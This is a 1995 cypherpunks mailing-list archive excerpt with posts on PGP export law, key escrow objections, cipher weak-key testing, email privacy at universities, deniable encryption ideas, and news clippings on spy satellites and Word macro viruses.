two (2) source files (encode.c and decode.c).
These source files both have the same small errors.

Change the source line ...
	int	a[12], b[12], out[12] ;
To ...
	int	a[18], b[18], out[18] ;

And change the source line ...
	static	int	start[480], leng[480] ;
To ...
	static	int	start[512], leng[512] ;

-tom <kelso@netcom.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A5113643667@attpls.net (Tom Jones)
Date: Tue, 12 Sep 95 00:15:49 PDT
To: cypherpunks@toad.com (Cypherpunks)
Subject: draft key mgmt props
Message-ID: <3E79EDD0>
MIME-Version: 1.0
Content-Type: text/plain


Dear Cypherpunks,

Does anyone here feel like explaining the situation between the three
key management proposals now at the internet draft stage?

Peace




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 12 Sep 95 08:24:15 PDT
To: gjeffers@socketis.net
Subject: Re: PGP in UK - snooped as unSTEALTHed?
Message-ID: <9509121520.AA12778@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
>          MICROSOFT VERSUS BORLAND FOR COMPILING/ASSEMBLING PGP

I recently got Symantec C++ 7.0 for less than either Microsoft or Borland
were selling their packages for.  It's a nicer development environment than
either as well.  It also support DOS/Windows3.x/NT/Chicago. (I don't remember
if it supports OS2.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kadie@eff.org (Carl M. Kadie)
Date: Tue, 12 Sep 95 08:24:04 PDT
To: eff-mail-cypherpunks@eff.org
Subject: Re: University logging mail to anon.penet
In-Reply-To: <199509082239.PAA20081@ix8.ix.netcom.com.810600068>
Message-ID: <4348m6$k72@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


stewarts@ix.netcom.com (Bill Stewart) writes:

[...]
>There may be ECPA issues involved, especially if CalPolySLO is a government-
>run university; the sysadmins certainly need to learn some ethics...
[...]

I think the ECPA should apply to private universities, too. The
FERPA also applies to virutally all U.S. private universities.

- Carl

=============== ftp://ftp.eff.org/pub/CAF/faq/email.privacy ===============
q: Can (should) my university monitor my email?

a: Ethically (and perhaps legally) email communications should have
the same privacy protection as telephone calls. It would be unwise for
any university employee to tap email communications without
authorization from the university president, university legal counsel,
and the academic freedom committee. According to Mike Godwin, legal
services counsel for the Electronic Frontier Foundation (EFF), the
U.S.'s Electronic Communications Privacy Act (ECPA) could be
reasonably construed to protect university email. This is also the
reported opinion of the U. of Michigan's lawers. Also, the U.S.'s
Family Educational Rights and Privacy Act gives students at all public
and most private schools some privacy rights.

A U.S. government task force says that "[Email] monitoring [of
government employees] of actual communications and communicators may
impinge on the Constitutional rights of freedom of speech (1st
Amendment), against unreasonable search and seizure (4th Amendment),
and against self-incrimination (5th amendment), as well as on the
right to privacy, specifically as set forth in both the Privacy Act
and the ECPA."

In the context of libraries, the American Library Association's Policy
on Confidentiality of Library Records suggests this procedure to deal
with an official or police request for information about users:

'When drafting local policies, libraries should consult with their
legal counsel to insure these policies are based upon and
consistent with applicable federal, state, and local law
concerning the confidentiality of library records, the disclosure
of public records, and the protection of individual privacy.

Suggested procedures include the following:

     1.  The library staff member receiving the request to
         examine or obtain information relating to circulation or
         other records identifying the names of library users,
         will immediately refer the person making the request to
         the responsible officer of the institution, who shall
         explain the confidentiality policy.

     2.  The director, upon receipt of such process, order, or
         subpoena, shall consult with the appropriate legal
         officer assigned to the institution to determine if such
         process, order, or subpoena is in good form and if there
         is a showing of good cause for its issuance.

     3.  If the process, order, or subpoena is not in proper form
         or if good cause has not been shown, insistence shall be
         made that such defects be cured before any records are
         released. (The legal process requiring the production
         of circulation or other library records shall ordinarily
         be in the form of subpoena "duces tecum" [bring your
         records] requiring the responsible officer to attend
         court or the taking of his/her deposition and may
         require him/her to bring along certain designated
         circulation or other specified records.)

     4.  Any threats or unauthorized demands (i.e., those not
         supported by a process, order, or subpoena) concerning
         circulation and other records identifying the names of
         library users shall be reported to the appropriate legal
         officer of the institution.

     5.  Any problems relating to the privacy of circulation and
         other records identifying the names of library users
         which are not provided for above shall be referred to
         the responsible officer.'



- Carl M. Kadie

ANNOTATED REFERENCES

(All these documents are available on-line. Access information follows.)

=================<a href="ftp://ftp.eff.org/pub/CAF/law/ecpa.1986.godwin">
law/ecpa.1986.godwin
=================</a>
* Privacy -- E-mail -- ECPA - University Site

Mike Godwin, legal services counsel for the Electronic Frontier
Foundation (EFF), says that the Electronic Communications Privacy Act
(ECPA) could be reasonably construed to protect university email.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/ferpa.text">
law/ferpa.text
=================</a>
* Privacy -- Students -- FERPA (Buckley Ammendment)

The full text of the Family Educational Right to Privacy Act
(Buckley Amendment).

=================<a href="http://www.eff.org/CAF/faq/email.policies.html">
faq/email.policies
=================</a>
* Email -- Policies
 
q: Do any universities treat email and computer files as private?
 
a: Yes, many universities treat email and computer files as private.
...

=================<a href="ftp://ftp.eff.org/pub/CAF/library/confidentiality.1.ala">
library/confidentiality.1.ala
=================</a>
* Confidentiality -- 1 (ALA)

The American Library Association's "Policy on Confidentiality of
Library Records"

Suggests how to handle police or official requests for information
about a user.

=================<a href="ftp://ftp.eff.org/pub/CAF/library/computer.draft.ala">
library/computer.draft.ala
=================</a>
* DRAFT: Access to Electronic ... Services and Networks ... (ALA)

A draft interpretation by the American Library Association of the
"Library Bill of Rights"

Says in part: "Libraries and librarians exist to facilitate [freedom
of speech and freedom to read] by providing access to, identifying,
retrieving, organizing, and preserving recorded expression regardless
of the formats or technologies in which that expression is recorded."

=================<a href="ftp://ftp.eff.org/pub/CAF/statements/bill-of-rights.aahe">
statements/bill-of-rights.aahe
=================</a>
* Bill of Rights ... for Electronic ... Learners

This is the "Bill of Rights and Responsibilities for the Electronic
Community of Learners". It could become the first widely endorsed
statement directly related to computers and academic freedom.

=================<a href="ftp://ftp.eff.org/pub/CAF/statements/caf-statement">
statements/caf-statement
=================</a>
* Computer and Academic Freedom Statement -- Draft

This is an attempt to codify the application of academic freedom to
academic computers. It reflects our seven months of on-line discussion
about computers and academic freedom. It covers free expression, due
process, privacy, and user participation.

Comments and suggestions are very welcome (especially when posted to
CAF-talk). All the documents referenced are available on-line.
(Critiqued).

=================<a href="ftp://ftp.eff.org/pub/CAF/statements/caf-statement.critique">
statements/caf-statement.critique
=================</a>
* Computer and Academic Freedom Statement -- Draft -- Critique

This is a critique of an attempt to codify the application of academic
freedom to academic computers. It reflects our seven months of on-line
discussion about computers and academic freedom. It covers free
expression, due process, privacy, and user participation.

Additional comments and suggestions are very welcome (especially when
posted to CAF-talk). All the documents referenced are available
on-line.

=================<a href="ftp://ftp.eff.org/pub/CAF/academic/student.freedoms.aaup">
academic/student.freedoms.aaup
=================</a>
* Student Freedoms (AAUP)

Joint Statement on Rights and Freedoms of Students -- This is the main
U.S. statement on student academic freedom.

=================<a href="ftp://ftp.eff.org/pub/CAF/academic/speech-codes.aaup">
academic/speech-codes.aaup
=================</a>
* Speech Codes (AAUP)

On Freedom of Expression and Campus Speech Codes Expression - An
official statement of the American Association of University
Professors (AAUP)

It says in part: "On a campus that is free and open, no idea can be
banned or forbidden.  No viewpoint or message may be deemed so hateful
or disturbing that it may not be expressed."

=================<a href="ftp://ftp.eff.org/pub/CAF/law/uwm-post-v-u-of-wisconsin">
law/uwm-post-v-u-of-wisconsin
=================</a>
* Expression -- Hate Speech -- UWM Post v. U Of Wisconsin

The full text of UWM POST v. U. of Wisconsin. This recent district
court ruling goes into detail about the difference between protected
offensive expression and illegal harassment. It even mentions email.

It concludes: "The founding fathers of this nation produced a
remarkable document in the Constitution but it was ratified only with
the promise of the Bill of Rights.  The First Amendment is central to
our concept of freedom.  The God-given "unalienable rights" that the
infant nation rallied to in the Declaration of Independence can be
preserved only if their application is rigorously analyzed.

The problems of bigotry and discrimination sought to be addressed here
are real and truly corrosive of the educational environment.  But
freedom of speech is almost absolute in our land and the only
restriction the fighting words doctrine can abide is that based on the
fear of violent reaction.  Content-based prohibitions such as that in
the UW Rule, however well intended, simply cannot survive the
screening which our Constitution demands."

=================<a href="ftp://ftp.eff.org/pub/CAF/law/gillard-v-schmidt">
law/gillard-v-schmidt
=================</a>
* Privacy -- School -- Staff Desk -- Gillard v. Schmidt

Description of an appellate court ruling that the school board could
not search the desk of a school counselor without a warrant.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/email.gov-employee">
law/email.gov-employee
=================</a>
* Privacy -- E-mail -- Government Employees

A U.S. government task force: "[Email] monitoring [of government
employees] of actual communications and communicators may impinge on
the Constitutional rights of freedom of speech (1st Amendment),
against unreasonable search and seizure (4th Amendment), and against
self-incrimination (5th amendment), as well as on the right to
privacy, specifically as set forth in both the Privacy Act and the
ECPA." Enclosed are guidelines for legitimate monitoring of government
employee email.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/mass-student-searches">
law/mass-student-searches
=================</a>
* Privacy -- Mass Students Searches

An excerpt from The ACLU Handbook: _The Rights of Students_, stating that
"there must a reasonable suspicion directed specifically at each student
before a school official can search students."

=================<a href="ftp://ftp.eff.org/pub/CAF/law/constraints.constitutional">
law/constraints.constitutional
=================</a>
* Constitution -- Public University -- Constraints

Comments from _A Practical Guide to Legal Issues Affecting College
Teachers_ by Partrica A. Hollander, D. Parker Young, and Donald D.
Gehring.  (College Administration Publication, 1985).  Discusses the
constitutional constraints on public universities including the
requires for freedom of expression, freedom against unreasonable
searches and seizures, due process, specific rules.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/ecpa.umich">
law/ecpa.umich
=================</a>
* Privacy -- E-mail -- ECPA - University Site

A summary of a newspaper report that the U. of Michigan's lawyers
believe(d) that the institution is barred under the federal Electronic
Communications Privacy Act from reading electronic mail.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/privacy.email">
law/privacy.email
=================</a>
* Privacy -- E-mail -- Law -- Hernandez

"Computer Electronic Mail and Privacy", an edited version of a law
school seminar paper by Ruel T. Hernandez.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/privacy.workplace">
law/privacy.workplace
=================</a>
* Privacy -- Workplace

Comments from and about _The new hazards of the high technology
workplace_ see (1991) 104 _Harvard Law Review_ 1898. Talks about email
and other electronic monitoring.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/email.bib">
law/email.bib
=================</a>
* Privacy -- E-mail -- Bibliography

I have been having an e-mail conversation with Stacy Veeder for several 
days on the topic of e-mail privacy. She mailed me this bibliography
which she has compiled for two papers which she is currently writing.

I post it here with permission.

PS - She is interested in talking with anyone who has some views on the 
topic/information to share.

Mark N.

=================
=================

If you have gopher, you can browse the CAF archive with the command
   gopher gopher.eff.org

These document(s) are also available by anonymous ftp (the preferred
method) and by email. To get the file(s) via ftp, do an anonymous ftp
to ftp.eff.org (192.77.172.4), and then:

  cd  /pub/CAF/law
  get ecpa.1986.godwin
  cd  /pub/CAF/law
  get ferpa.text
  cd  /pub/CAF/faq
  get email.policies
  cd  /pub/CAF/library
  get confidentiality.1.ala
  cd  /pub/CAF/library
  get computer.draft.ala
  cd  /pub/CAF/statements
  get bill-of-rights.aahe
  cd  /pub/CAF/statements
  get caf-statement
  cd  /pub/CAF/statements
  get caf-statement.critique
  cd  /pub/CAF/academic
  get student.freedoms.aaup
  cd  /pub/CAF/academic
  get speech-codes.aaup
  cd  /pub/CAF/law
  get uwm-post-v-u-of-wisconsin
  cd  /pub/CAF/law
  get gillard-v-schmidt
  cd  /pub/CAF/law
  get email.gov-employee
  cd  /pub/CAF/law
  get mass-student-searches
  cd  /pub/CAF/law
  get constraints.constitutional
  cd  /pub/CAF/law
  get ecpa.umich
  cd  /pub/CAF/law
  get privacy.email
  cd  /pub/CAF/law
  get privacy.workplace
  cd  /pub/CAF/law
  get email.bib

To get the file(s) by email, send email to ftpmail@decwrl.dec.com
Include the line(s):

  connect ftp.eff.org
  cd  /pub/CAF/law
  get ecpa.1986.godwin
  cd  /pub/CAF/law
  get ferpa.text
  cd  /pub/CAF/faq
  get email.policies
  cd  /pub/CAF/library
  get confidentiality.1.ala
  cd  /pub/CAF/library
  get computer.draft.ala
  cd  /pub/CAF/statements
  get bill-of-rights.aahe
  cd  /pub/CAF/statements
  get caf-statement
  cd  /pub/CAF/statements
  get caf-statement.critique
  cd  /pub/CAF/academic
  get student.freedoms.aaup
  cd  /pub/CAF/academic
  get speech-codes.aaup
  cd  /pub/CAF/law
  get uwm-post-v-u-of-wisconsin
  cd  /pub/CAF/law
  get gillard-v-schmidt
  cd  /pub/CAF/law
  get email.gov-employee
  cd  /pub/CAF/law
  get mass-student-searches
  cd  /pub/CAF/law
  get constraints.constitutional
  cd  /pub/CAF/law
  get ecpa.umich
  cd  /pub/CAF/law
  get privacy.email
  cd  /pub/CAF/law
  get privacy.workplace
  cd  /pub/CAF/law
  get email.bib
-- 
Carl Kadie -- I do not represent EFF or my employer; this is just me.
 =Email: kadie@eff.org, kadie@cs.uiuc.edu =
 =URL: <http://www.eff.org/CAF/>, <ftp://ftp.cs.uiuc.edu/pub/kadie/> =




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 12 Sep 95 01:05:41 PDT
To: cypherpunks@toad.com
Subject: anyone got a cpunk URL for the UK munitions T?
Message-ID: <24928.9509120805@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



On the subject of the UK printing of the muntions T-shirt, I've got a
problem, I would like to put a URL for how to obtain the T-shirts, and
cypherpunk political material, anti ITAR, clipper etc, bu yet I can't
very well put my URL:

	http://www.dcs.ex.ac.uk/~aba/rsa/

because that may possibly move within a year, maybe sooner, and
T-shirts are so permanent :-(

It seems like too good an opportunity to miss, as some people may get
the thing nice publicity, and interest in the cypherpunks take on
encryption, so it would be ideal to have an on-line reference on the
shirt.

So what I was thinking is it would be nice if someone with a permanent
URL, could put a pointer to my URL, that could be updated later, as my
URL moves?

A cypherpunks page which has been and will be around for a *long time*
with lots of info or pointers to info on ITAR, the evils of key escrow
etc would be ideal.

I don't need the WWW space for the actual info as such, just a pointer
which can point to where-ever it is my URL moves to, and as most
cpunks URLs seem to be in the US, it wouldn't be a v good idea to put
my content on a US server anyway (arguably).

Any offers?

Also now I'm here, there were a few people on the list who ordered
shirts from me, and the progress has been slow, if you want to see the
reasons, and up-to-date state of progress, take a look at:

	http://www.dcs.ex.ac.uk/~aba/uk-shirt.html

I need to decide soon as to what URL to print, I was otherwise
thinking of removing the URL, as my sys admin made some strange
cryptic comment about me not having my URL after a while anyway (when
I finish the course, pointed comment? who knows), and I thought it
might not go down to well if I printed my URL on the T-shirt, at least
if it's an indirect pointer I have the option to get alternate WWW
space.

I have decided to switch printers as the last guy seems to have
vanished, no answers to messages on answer phone for > 1 week, and
some shirt printers (like the new one I've chosen) offer to the whole
job in a week, and people are getting impatient for their shirts.  So
I ideally need a commitment of a URL so that I can modify the design &
send of to this new printers tonight.

The main criteria, apart from a nice selection of links (I've got ITAR
and cpunk links allready anyway) is that the URL pointing at my roving
URL is going to stay there for a few years, at least.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Tue, 12 Sep 95 09:20:43 PDT
To: cypherpunks@toad.com
Subject: Elliptic Curve Public Key Crypto
Message-ID: <199509121620.JAA08381@well.com>
MIME-Version: 1.0
Content-Type: text/plain




Mike Rosing writes:

>in the cypherpunks ftp site /pub/cypherpunks/ciphers are 2 ascii
>files. One contains code and the other contains documentation:
>eliptic.src and elliptic.doc.  The code portion is a cat'ed block
>of files: headers, C sources and a set of prime numbers.  The
>documentation attempts to explain the math, but it does help if
>you already know number theory.  It hopefully isn't necessary.
 
 Thanks Mike for all your effort!!

 Now could someone remind me where the Cypherpunks FTP site is?

 Please?

Brian D Williams
Cypherpatriot

 " Zen? Well it beats sitting around on your ass all day doing
   nothing! "





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Tue, 12 Sep 95 07:58:34 PDT
To: aba@dcs.exeter.ac.uk
Subject: Re: anyone got a cpunk URL for the UK munitions T?
In-Reply-To: <24928.9509120805@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.SUN.3.90.950912095153.27787A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


I would be more than happy to set up a page for it or anyother cypherpunk 
material at underground.org. I been meaning to do some major updates 
anyway just been very busy.

Aleph One / aleph1@dfw.net
http://underground.org/

On Tue, 12 Sep 1995 aba@dcs.exeter.ac.uk wrote:

> So what I was thinking is it would be nice if someone with a permanent
> URL, could put a pointer to my URL, that could be updated later, as my
> URL moves?
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Tue, 12 Sep 95 08:59:10 PDT
To: cypherpunks@toad.com
Subject: Re: Phil Zimmermann/Amnesty International?
In-Reply-To: <199509021658.MAA29224@frankenstein.piermont.com>
Message-ID: <6aaVwkkAseQS084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 02 Sep 1995, "Perry E. Metzger" <perry@piermont.com> wrote:
> Alan Westrope writes:
      [replying to M. Froomkin about statute of limitations for prz]
> > June '96.  Zimmermann and Dubois appeared on a local talk radio show
> > recently; a friend happened to catch the program, taped it, and played
> > excerpts at a Cypherpunks meeting.  This date was mentioned by Phil Dubois.

> That's not possible. The offense in question took place on or before
> September 8, 1992, and the statute of limitations is, to my knowledge,
> three years. Even if it were four years, it would have to be September
> 8th of that year.  Branko Lankester announced availability of PGP 2.0
> on Mon, 7 Sep 1992 at about 20:22 GMT, so since the allegation is that
> he exported PGP Version 1.0 to the team that developed PGP 2.0
> overseas, any export that Phil performed would have of necessity to
> have taken place before then.

Perry's response and Brian Davis' remarks about prosecutorial "creativity"
prompted me to ask Phil Dubois for clarification.  (I told him I would
probably pass his reply along to the list, so I'm not violating email
confidentiality here.)  Here's the relevant snippet:

========================================================================

I believe that the statute expires in June of '96, because there is a
five-year statute on the export-violation allegation and because PGP was
released in June of '91, and whoever exported it did so shortly after the
release.  It is true, however, that prosecutors have been very creative in
extending the statute when they've felt the need to do so.  We can only
hope that DOJ will not feel the need in this case.

========================================================================

I also feel Phil will be largely off the hook by June.  It would be
damn silly to prolong the matter, especially since the complete source
code has been published internationally in OCR format now.  Also, I
expect the Feds would rather focus their "creative" energies on the
Bernstein/EFF export issue.

But who knows what anti-crime hysteria might be whipped up in an
election year, or who it might become handy to demonize, etc.


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: I *swear* I have not used the term 'big-endian' in the last 10 years.

iQCVAwUBMFWsMlRRFMq4NZY5AQHTgQP8DFDKtcK3JfFffURlwwXP+o+PMkk57dO2
baWIaBBSRxp0pUivP+vVDSP1NwMhpRDt+apW10qCgemJWgGlg8f2NRW6rq2LgpfJ
1fuJJL/mLQo2W+UfGqQS8PFv3CwvFLdE1hEMQfysFGo3UY2nYOeuMe8vJdednFP2
MSm7B2e9JcM=
=SOsn
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Limpert" <johnl@radix.net>
Date: Tue, 12 Sep 95 07:32:41 PDT
To: "thad@hammerhead.com>
Subject: RE: 64 bit crypto
Message-ID: <01BA80F9.97A820A0@dialin18.annex1.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


<code deleted>

>Then the prepare_key routine would take much much longer.
>
>The idea is that a 64 bit crypto routine can be arbitrarily
>secure against brute-forcing, if you are willing to pay a
>runtime penalty every time you use it.

My thought was that there might be shortcuts that the attacker
could use to compute the permutation of the state array in less time.

I wrote a small test program to look for cycles and weak keys in the
65536 iteration permutation. I assumed a 40 bit key. One weak key
was found, 0x0101010101, that produces a 255 iteration cycle.
375 randomly chosen keys were tested and no cycles were found.

There ought to be a faster way to compute the permutation with
a more analytical approach. My skepticism tells me that nothing
is a replacement for more key bits.

In a semi-related question, why don't we see Feistel systems with
larger numbers of rounds? Would a modified DES with 256 rounds be
any more secure than standard DES?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 12 Sep 95 07:58:25 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: GAK
Message-ID: <199509121457.KAA28748@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:25 PM 9/3/95 -0400, Brian Davis wrote:

>I, of course, know of the "dislike" of GAK here.  I am curious to know, 
>however, if the "dislike" is because government would have access under 
>any circumstances or if the primary worry is that government will cheat 
>and get access when most would agree that they shouldn't (either by the 
>judge "cheating" or a TLA stealing it).

Individuals will have their individual objections.  My objections are that I
don't like governments spending tax money that they don't absolutely have
to.  Their own survival is *not* a necessity.  I think controlling people's
speech is a waste of money.  Very few Common Law crimes (ie real crimes) are
dependent on wiretap evidence for solution.  Only phoney bureaucratic crimes
(the retail pharmaceutical trade, insider trading, gambling, conspiring to
overthrow the government, etc) need wiretaps. 

My second objection is the control of people's speech.  If I communicate
with someone, I want to communicate with *them*.  I don't want to
communicate with the Feds.  The Supremes have held that the right to speak
includes the right not to be forced to speak.  By implication, I would argue
that I have the right to choose my own channels of communication including
my intended audience (and this has been upheld by the Supremes in other
contexts).

If the Feds want to know what I've written or said (non-publicly) let them
subpoena me and I will be happy to tell them to go to hell.

If we can deploy technologies to protect our freedom to communicate the way
*we* choose to, then we have the right to do so.  Beyond rights, we have the
power to do so --- which is worth even more.

>In other words ... if it took agreement by a review board composed of 
>non-LEA members of this list, would the escrow be acceptable??

I don't think many of us would feel better if a private party had to approve
the invasion of our privacy.

DCF

"You can ignore all of the rest of bullshit.  All that you need to know
about an enemy is how many guns and men does he have and can they stand fire."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry W. Farkas" <hfarkas@ims.advantis.com>
Date: Tue, 12 Sep 95 08:00:24 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology tries to break PGP - and
Message-ID: <Pine.A32.3.91.950912104706.38129A-100000@pangloss.ims.advantis.com>
MIME-Version: 1.0
Content-Type: text/plain



Repost: the following bounced:
-----------------------------------------------------------------------------

On Fri, 8 Sep 1995, Tom Rollins wrote:

> If Larry Wollersheim does have the valid key.  It would be a simpler
> process to know what fake key to use and work it backwards through
> the MD5 to arrive at an ascii string to produce the fake key.
>
> Too bad this wouldn't be plausable for the secret ring.  Perhaps PGP
> needs an option to specify the key in Hex and make the process easy.

Here's another option.  I have no idea if it is possible, nor how it would
be implemented!  PGP could allow for an alternate secret key and a
standard "dummy" document from somewhere in your path.  A command line
option would encrypt for both keys (as if there were 2 recipients) and
append the "dummy" document to the end of the target file when encrypting. 

When the safety is finally removed from the gun at your head (sorry for
the drama) you hand over your alternate secret key.  If decrypted with the
"alternate" or "fake" secret key, the encrypted file is wiped until it
reaches a marker; the remainder of the file is displayed.  If you use your
"primary" or "real key", the extraneous text is simply stripped. 

Alternately, the "dummy" file could overwrite the "real" message n times, 
to keep the decrypted file size more realistic.

If you are forced to turn over keys some day (and I think there is at
least a reasonable likeihood of that) then They will have a much harder
time arguing "But that's not what the file *really* said and, deep inside
of me, I know it!".  At that point, with a secure wipe going on while the
"decryption" was taking place, you have done the best you could.  I agree-
a search warrent gives authorities the right to search your home (or
disk)- not a guarantee that they'll find what they're looking for. 

===========================================================================
     Henry W. Farkas      |      Me?    Speak for IBM?    Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------
   hfarkas@vnet.ibm.com   |     http://newstand.ims.advantis.com/henry
      henry@nhcc.com      |          http://www.nhcc.com/~henry
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not
  fast, but it's not bad, and we're cheaper than the guy down the street!"
===========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 12 Sep 95 08:00:21 PDT
To: cypherpunks@toad.com
Subject: NRO_puf
Message-ID: <199509121500.LAA08738@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-12-95. NYPaper:

   "Spy Satellites' Early Role As 'Floodlight' Coming Clear."

      Corona. Everything about it was beyond top secret -- its
      name and history, builders and operators, cameras and
      orbits, photographs and interpreters and, most important
      of all, what it snooped on from space. It was officially
      and assiduously treated for decades as if it did not
      exist. The 95 Corona satellites that successfully
      conducted espionage from 1960 to 1972 turn out to have
      been remarkably advanced tools whose development, far
      from the work of an inner circle, drew on the nation's
      top scientific and industrial talent. More important,
      the new disclosures show just how greatly the craft
      revolutionized Washington's ability to understand its
      cold war friends and enemies.

      Sergei Khrushchev, son of the Soviet leader Nikita S.
      Khrushchev, told the Itek conference that one Corona
      film pod dropped into a Russian forest, where
      ax-wielding woodsmen chopped it up. Another spy
      satellite misdirected its film pod into a field in
      central Asia, where peasants wrapped the precious Kodak
      film around poles to provide solitude for a privy.


   NRO_puf  (16 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 12 Sep 95 08:05:01 PDT
To: cypherpunks@toad.com
Subject: VOO_doo
Message-ID: <199509121504.LAA09688@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-12-95. NYPaper:


   "Bulletin Board Is Virtual; Hacker Arrests Are Real."

      It was a classic sting operation, the kind of undercover
      gambit that has nabbed bad guys for decades. But the
      meeting place for this subterfuge was not some grimy
      storefront. It was a computer bulletin board that the
      United States Secret Service had rigged together to
      troll for people who are illegally trafficking in the
      codes that program cellular phones.


   " 'Innocent' Files Can Carry a Virus."

      A new kind of computer virus has descended upon the
      world. How easy is it to create one? Fifteen minutes
      after opening a Microsoft Word reference manual, I had
      cranked out a one-line program that could eliminate
      crucial system files from a hard drive. By bedtime I had
      figured out how to get this file to transmogrify Word
      itself so it would embed my trick program in any
      document it opened. In an evening, I had created a virus
      of my very own. This is scary stuff. Scarier still is
      that if I can do it, millions of others can too.
      Henceforth virtually every document on the information
      highway must be considered suspect. 


   2: VOO_doo












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian S. Nelson" <ian@bvsd.k12.co.us>
Date: Tue, 12 Sep 95 10:27:17 PDT
To: Andrew.Spring@ping.be (Andrew Spring)
Subject: Re: GAK/weak crypto rationale?
In-Reply-To: <v01510100ac7a4e673a66@[193.74.217.13]>
Message-ID: <199509121726.LAA27609@bvsd.k12.co.us>
MIME-Version: 1.0
Content-Type: text/plain


> 
> >intercepts requested and authorized in the past year.  As I recall, the
> >number was quite small - around 12K [?].  Someone had found this out
> >through an FOIA request, perhaps, (my recollection of it is poor). It was
> 
> I think it's about 1200.
> 
> >not a large number, anyway.  I must conclude that the actual number of
> >intercepts is much, much larger than they are saying, and that they must
> >be getting what they perceive to be good intel from all this snooping.
> >
> 
> A more cautious conclusion would be would be that the importance (to the
> LEA's) of the busts made with crypto is much larger than the numbers
> suggest.  You could interpret that a lot of ways:  I suspect that
> high-profile career-enhancing cases are highly dependent on wiretaps.

It could also be argued that the number of busts and wire taps will go up 
dramatically as more and more people begin to use communications in more 
integrated ways with thier life and career.  It is kind of a fallacy, but
communications does seem to be a rapidly growing market.  I imagine the folks
who push for that sort of crap are thinking of the future, else we'd already 
have it.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 12 Sep 95 09:29:17 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Digital Fingerprinting
Message-ID: <9509121627.AA00538@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  I said I'd mention "state secrets" again. The usual example for
>  making subtle modifications to documents to see who leaked it is
>  the intelligence community, which gave us the term "barium" (because
>  the changes look like barium in an x-ray diagnostic).

Such technology would be very useful in business, especially the high-tech  
industry.  Think of how many non-disclosure agreements are signed every day  
relating to new products developed for the software industry alone.  Many  
companies are very paranoid and already 'fingerprint' information by using  
unique code-names for projects, for instance.  i.e. the spec sheet on their  
new GAK crypto product they give to Alice may be code-named 'project foobar'  
but the one they give to Bob may be code-named 'project burris'...  Then,  
when the information leaks out they check which person they gave the document  
with that code-name and they know who to sue (or at least not give any more  
trade-secrets to).  It's very simplistic but it has been know to work in the  
past.

Most of the real technology for doing this is much better, of course...   
However, what stops you from printing out a fingerprinted document and  
scanning it back in, for instance?


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Tue, 12 Sep 95 08:34:30 PDT
To: cypherpunks@toad.com
Subject: Netscape to patch shareware version
Message-ID: <Pine.BSD/.3.91.950912111322.20533B-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain


